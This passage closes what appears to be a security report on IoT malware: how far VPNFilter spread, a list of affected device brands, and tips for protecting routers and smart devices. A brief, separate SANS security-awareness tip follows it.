    The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

    • ASUS
    • D-Link
    • Huawei
    • Linksys
    • MikroTik
    • Netgear
    • QNAP
    • TP-Link
    • Ubiquiti
    • Upvel
    • ZTE

    The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.

    Conclusion

    Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

    Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

    Here are some simple tips to help minimize the risk of smart device infection:

    • Don’t give access to the device from an external network unless absolutely necessary
    • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
    • Regularly check for new firmware versions and update the device
    • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
    • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
    • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.

    Trust Your Instincts

    SANS Tip of the Day - Tue, 09/18/2018 - 01:00
    Ultimately, common sense is your best protection. If an email, phone call or online message seems odd, suspicious or too good to be true, it may be an attack.